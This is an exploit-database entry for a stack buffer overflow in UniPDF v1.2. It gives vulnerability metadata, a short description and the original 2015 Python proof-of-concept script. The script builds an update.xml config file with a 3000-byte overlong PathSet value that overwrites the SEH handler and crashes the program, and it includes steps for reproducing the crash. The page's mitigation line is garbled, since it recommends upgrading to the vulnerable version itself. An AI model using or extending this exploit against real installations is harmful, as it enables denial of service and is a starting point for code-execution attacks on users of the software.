UniPDF v1.2 BufferOverflow, SEH overwrite DoS PoC

vendor:

UniPDF

by:

Avinash Kumar Thapa

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: UniPDF

Affected Version From: v1.2

Affected Version To: v1.2

Patch Exists: YES

Related CWE: N/A

CPE: a:unipdf:unipdf

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP- Service Pack 3 && Windows 7 Home Basic

2015

UniPDF v1.2 BufferOverflow, SEH overwrite DoS PoC

UniPDF v1.2 is vulnerable to a buffer overflow vulnerability when a specially crafted XML file is opened. This can be exploited to cause a denial of service condition by overwriting the SEH handler.

Mitigation:

Upgrade to the latest version of UniPDF v1.2

Source

Exploit-DB raw data:

# Exploit Title: UniPDF v1.2 BufferOverflow, SEH overwrite DoS PoC
# Author : Avinash Kumar Thapa "-Acid"
# Date of Testing :  25th April 2015
# Tested On : Windows XP- Service Pack 3 && Windows 7 Home Basic
# Vendor Homepage: http://unipdf.com/
# Software Link: http://unipdf.com/file/unipdf-setup.exe
# Steps to reproduce the Crash is:
#   Step 1: Run the POC
#   Step 2: Go to local Disk C:\Program Files\UniPDF and copy the POC there
#   Step 3 : Run the UniPdf.exe 

buff2 = "\x41" * 3000
crash = "      <config>\n"
crash +=  "         <UserDefine>\n"
crash  +=               "<Language ID=\"0\" />\n"
crash +=                "<Path PathSet=\""+buff2+"\" Path=\"\" />\n"
crash +=                "<ImageFormat set=\"2\" />\n"
crash +=                "<Res set=\"96\" />\n"
crash +=                "<bit set=\"24\" />\n"
crash +=                "<Prefix set=\"\" />\n"
crash +=                "<Doc set=\"1\" />\n"
crash +=                "<Help set=\"1\" />\n"
crash +=             "</UserDefine>\n"
crash +=        "</config>\n"

print "POC Created By -Acid"
print " acid.exploit@gmail.com" 
file = open("update.xml","w")
file.write(crash)
file.close()